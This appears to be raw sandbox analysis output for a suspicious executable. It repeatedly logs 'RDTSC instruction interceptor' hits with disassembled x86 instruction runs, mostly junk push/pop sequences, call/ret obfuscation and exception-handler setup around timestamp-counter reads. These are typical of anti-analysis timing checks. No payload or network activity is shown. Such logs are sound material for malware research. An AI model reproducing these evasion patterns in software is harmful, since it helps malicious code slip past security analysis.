Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4230C second address: C4231B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBCB0ED65F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C425DC second address: C425FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C425FA second address: C425FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C494C7 second address: C494E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0E4CF77h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C07B3D second address: C07B46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4C274 second address: C4C27B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4C3CB second address: C4C3DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4C3DA second address: C4C3F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FBCB0E4CF72h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FBCB0E4CF6Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4C3F2 second address: C4C3F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4C55E second address: C4C5B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF70h 0x00000007 push edi 0x00000008 jo 00007FBCB0E4CF66h 0x0000000e jc 00007FBCB0E4CF66h 0x00000014 pop edi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jno 00007FBCB0E4CF68h 0x0000001e jl 00007FBCB0E4CF7Bh 0x00000024 jmp 00007FBCB0E4CF75h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FBCB0E4CF71h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4C5B7 second address: C4C5BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4C5BB second address: C4C5C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4CC2D second address: C4CC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4CC31 second address: C4CC55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007FBCB0E4CF66h 0x0000000f jns 00007FBCB0E4CF66h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007FBCB0E4CF66h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4CC55 second address: C4CC59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4CC59 second address: C4CC90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF75h 0x00000007 jmp 00007FBCB0E4CF6Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FBCB0E4CF6Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4CC90 second address: C4CC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C50544 second address: C50549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5062A second address: C5062E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5062E second address: C50634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C50D04 second address: C50D0E instructions: 0x00000000 rdtsc 0x00000002 js 00007FBCB0ED65FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C50EF7 second address: C50EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C50EFB second address: C50EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5101A second address: C51031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBCB0E4CF72h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C510ED second address: C510F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C51722 second address: C51726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C51726 second address: C5172A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5172A second address: C51730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C51730 second address: C51773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6607h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c cld 0x0000000d push 00000000h 0x0000000f mov edi, dword ptr [ebp+129C3805h] 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+12B44B68h], ecx 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FBCB0ED6600h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C51773 second address: C51793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C51793 second address: C51797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C51797 second address: C5179B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C52156 second address: C52161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FBCB0ED65F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C52161 second address: C521D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 and esi, 6D69B6AFh 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FBCB0E4CF68h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a xor edi, 036BB1E2h 0x00000030 push 00000000h 0x00000032 jne 00007FBCB0E4CF6Ch 0x00000038 xchg eax, ebx 0x00000039 push edi 0x0000003a pushad 0x0000003b jno 00007FBCB0E4CF66h 0x00000041 push ecx 0x00000042 pop ecx 0x00000043 popad 0x00000044 pop edi 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push ecx 0x00000049 jmp 00007FBCB0E4CF78h 0x0000004e pop ecx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C53287 second address: C53297 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBCB0ED65F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C53D94 second address: C53DAF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jng 00007FBCB0E4CF7Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBCB0E4CF6Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C53DAF second address: C53DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C54842 second address: C548B4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBCB0E4CF79h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FBCB0E4CF68h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 or dword ptr [ebp+12B42CD1h], ebx 0x0000002b push 00000000h 0x0000002d movsx edi, ax 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FBCB0E4CF68h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 ja 00007FBCB0E4CF66h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C548B4 second address: C548C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6600h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C55B8E second address: C55B98 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBCB0E4CF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C568C7 second address: C568D1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBCB0ED65FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C568D1 second address: C56941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FBCB0E4CF68h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov edi, dword ptr [ebp+129C378Dh] 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+129C1945h], edi 0x0000002f or si, 3C35h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007FBCB0E4CF68h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 mov dword ptr [ebp+129C1B9Ah], edx 0x00000056 push eax 0x00000057 pushad 0x00000058 push edx 0x00000059 jnc 00007FBCB0E4CF66h 0x0000005f pop edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push edi 0x00000063 pop edi 0x00000064 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C58424 second address: C58431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C56659 second address: C5665E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C570BE second address: C570D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C570D4 second address: C570DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5A4C9 second address: C5A506 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jne 00007FBCB0ED65F8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBCB0ED6605h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5A506 second address: C5A554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FBCB0E4CF68h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 movsx ebx, di 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e xor dword ptr [ebp+129C1A30h], eax 0x00000034 xchg eax, esi 0x00000035 push ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 ja 00007FBCB0E4CF66h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5C451 second address: C5C456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5C456 second address: C5C45C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C59642 second address: C59648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5E397 second address: C5E39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5E39B second address: C5E39F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5E39F second address: C5E3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+129C3625h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FBCB0E4CF68h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d add ebx, dword ptr [ebp+129C2B2Bh] 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5A6F7 second address: C5A7A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FBCB0ED65F6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f xor ebx, 4B9F7D77h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov bx, ax 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007FBCB0ED65F8h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 jmp 00007FBCB0ED65FEh 0x00000045 mov eax, dword ptr [ebp+129C0EE5h] 0x0000004b push 00000000h 0x0000004d push edx 0x0000004e call 00007FBCB0ED65F8h 0x00000053 pop edx 0x00000054 mov dword ptr [esp+04h], edx 0x00000058 add dword ptr [esp+04h], 00000018h 0x00000060 inc edx 0x00000061 push edx 0x00000062 ret 0x00000063 pop edx 0x00000064 ret 0x00000065 movsx ebx, bx 0x00000068 push FFFFFFFFh 0x0000006a cmc 0x0000006b nop 0x0000006c jg 00007FBCB0ED65FCh 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 jmp 00007FBCB0ED65FEh 0x0000007b jmp 00007FBCB0ED65FBh 0x00000080 popad 0x00000081 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5D4D3 second address: C5D4D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5D4D7 second address: C5D4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5D4E9 second address: C5D4ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5D4ED second address: C5D4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5D4F3 second address: C5D4FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FBCB0E4CF66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5F325 second address: C5F329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C602C0 second address: C602C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C602C4 second address: C602C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C602C8 second address: C60306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007FBCB0E4CF75h 0x0000000f cld 0x00000010 pop ebx 0x00000011 push 00000000h 0x00000013 sub bx, 2F0Ch 0x00000018 push 00000000h 0x0000001a xor dword ptr [ebp+129C1891h], edi 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FBCB0E4CF6Bh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C60306 second address: C6030B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C6030B second address: C60311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5F470 second address: C5F474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5F474 second address: C5F478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C5F478 second address: C5F486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C612A2 second address: C612A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C612A6 second address: C612AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C6240E second address: C62418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FBCB0E4CF66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C65F5F second address: C65F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C65F63 second address: C65F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C650D5 second address: C6515B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007FBCB0ED6609h 0x00000011 popad 0x00000012 jng 00007FBCB0ED65FCh 0x00000018 jc 00007FBCB0ED65F6h 0x0000001e popad 0x0000001f nop 0x00000020 sbb bh, FFFFFFC6h 0x00000023 push dword ptr fs:[00000000h] 0x0000002a mov edi, edx 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 mov dword ptr [ebp+129C295Ch], edx 0x00000039 mov eax, dword ptr [ebp+129C1205h] 0x0000003f mov edi, 2C57C60Ah 0x00000044 push FFFFFFFFh 0x00000046 push 00000000h 0x00000048 push ecx 0x00000049 call 00007FBCB0ED65F8h 0x0000004e pop ecx 0x0000004f mov dword ptr [esp+04h], ecx 0x00000053 add dword ptr [esp+04h], 00000018h 0x0000005b inc ecx 0x0000005c push ecx 0x0000005d ret 0x0000005e pop ecx 0x0000005f ret 0x00000060 mov dword ptr [ebp+129C1A95h], esi 0x00000066 nop 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C6515B second address: C65170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0E4CF70h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C66127 second address: C6612B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C6612B second address: C66149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FBCB0E4CF6Ch 0x0000000c jl 00007FBCB0E4CF66h 0x00000012 popad 0x00000013 push eax 0x00000014 jo 00007FBCB0E4CF74h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
